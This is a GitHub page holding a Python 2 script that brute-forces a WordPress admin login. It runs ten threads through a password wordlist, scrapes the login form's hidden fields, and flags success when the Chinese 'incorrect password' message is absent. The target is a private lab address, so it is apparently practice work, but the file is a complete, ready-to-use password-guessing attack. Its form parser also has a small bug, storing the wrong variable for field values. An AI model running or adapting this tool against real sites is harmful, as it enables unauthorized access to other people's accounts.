pycode/brute_form.py at master · coldhurt/pycode · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#!/usr/bin/python
#coding=utf-8

import urllib
import urllib2
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
from dir_bruster import build_wordlist

thread_count = 10
target_url = 'http://192.168.99.196/wordpress/wp-login.php'
target_post = 'http://192.168.99.196/wordpress/wp-login.php'
username = 'admin'
wordlist = './pwd.txt'
username_field = 'log'
password_field = 'pwd'

class Bruter(object):
    def __init__(self, username, wordlist):
        self.username = username
        self.password_list = wordlist
        self.found = False
        print('Finished setting up for:%s' % username)

    def run_bruteforce(self):
        for i in range(thread_count):
            t = threading.Thread(target=self.web_brute)
            t.start()

    def web_brute(self):
        while not self.password_list.empty() and not self.found:
            brute = self.password_list.get().rstrip()
            jar = cookielib.FileCookieJar('cookies')
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            res = opener.open(target_url)
            page = res.read()

            print('Trying: %s:%s (%d left)' % (self.username, brute, self.password_list.qsize()))

            parser = BruteParser()
            parser.feed(page)

            post_tags = parser.tag_results

            post_tags[username_field] = self.username
            post_tags[password_field] = brute
            login_data = urllib.urlencode(post_tags)
            print(login_data)

            login_res = opener.open(target_post, login_data)
            login_result = login_res.read()

            if '密码不正确' not in login_result:
                self.found = True
                print('[*] Brute successful by %s:%s' % (self.username, brute))


class BruteParser(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
        self.tag_results = {}

    def handle_starttag(self, tag, attrs):
        if tag == 'input':
            tag_name = None
            tag_value = None
            for name, value in attrs:
                if name == 'name':
                    tag_name = value
                if name == 'value':
                    tag_value = value
            if tag_name is not None:
                self.tag_results[tag_name] = value

pwd_q = build_wordlist(wordlist)
brute_obj = Bruter(username, pwd_q)
brute_obj.run_bruteforce()